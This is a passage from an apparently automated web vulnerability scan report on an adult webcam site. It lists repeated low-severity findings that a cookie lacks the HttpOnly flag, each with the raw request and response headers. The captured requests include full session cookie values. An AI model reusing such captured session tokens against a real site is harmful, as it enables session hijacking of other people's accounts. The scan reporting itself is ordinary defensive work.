Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:21:54 GMT
Connection: close
Content-Length: 39880
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...

11.346. http://imlive.com/live-sex-chats/adult-shows/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://imlive.com
Path:   /live-sex-chats/adult-shows/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: imlv. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /live-sex-chats/adult-shows/ HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:23:02 GMT
Connection: close
Content-Length: 25126
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...

11.347. http://imlive.com/live-sex-chats/cam-girls/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://imlive.com
Path:   /live-sex-chats/cam-girls/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: imlv. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /live-sex-chats/cam-girls/ HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:18:36 GMT
Connection: close
Content-Length: 220458
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...

11.348. http://imlive.com/live-sex-chats/cam-girls/categories/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://imlive.com
Path:   /live-sex-chats/cam-girls/categories/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: imlv. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /live-sex-chats/cam-girls/categories/ HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:18:38 GMT
Connection: close
Content-Length: 27140
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...

11.349. http://imlive.com/live-sex-chats/cam-girls/hotspots/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://imlive.com
Path:   /live-sex-chats/cam-girls/hotspots/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: imlv. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /live-sex-chats/cam-girls/hotspots/ HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Location: /webcam-sign-up/
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhoqyccjVCXBTf954wWPYvp64MXC0Yh32GzThoTYj52vyg%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:18:41 GMT
Connection: close
Content-Length: 137

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2fwebcam-sign-up%2f">here</a>.</h2>
</body></html>

11.350. http://imlive.com/live-sex-chats/cams-aroundthehouse/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://imlive.com
Path:   /live-sex-chats/cams-aroundthehouse/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: imlv. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /live-sex-chats/cams-aroundthehouse/ HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:22:42 GMT
Connection: close
Content-Length: 33116
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...

11.351. http://imlive.com/live-sex-chats/caught-on-cam/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://imlive.com
Path:   /live-sex-chats/caught-on-cam/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: imlv. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /live-sex-chats/caught-on-cam/ HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:22:21 GMT
Connection: close
Content-Length: 25588
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...

11.352. http://imlive.com/live-sex-chats/couple/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://imlive.com
Path:   /live-sex-chats/couple/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: imlv. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /live-sex-chats/couple/ HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:19:30 GMT
Connection: close
Content-Length: 110732
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...

11.353. http://imlive.com/live-sex-chats/fetish/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://imlive.com
Path:   /live-sex-chats/fetish/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: imlv. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /live-sex-chats/fetish/ HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:19:51 GMT
Connection: close
Content-Length: 212158
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...

11.354. http://imlive.com/live-sex-chats/fetish/categories/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://imlive.com
Path:   /live-sex-chats/fetish/categories/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: imlv. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /live-sex-chats/fetish/categories/ HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:20:44 GMT
Connection: close
Content-Length: 24479
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...

11.355. http://imlive.com/live-sex-chats/free-sex-video-for-ipod/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://imlive.com
Path:   /live-sex-chats/free-sex-video-for-ipod/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: imlv. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /live-sex-chats/free-sex-video-for-ipod/ HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; 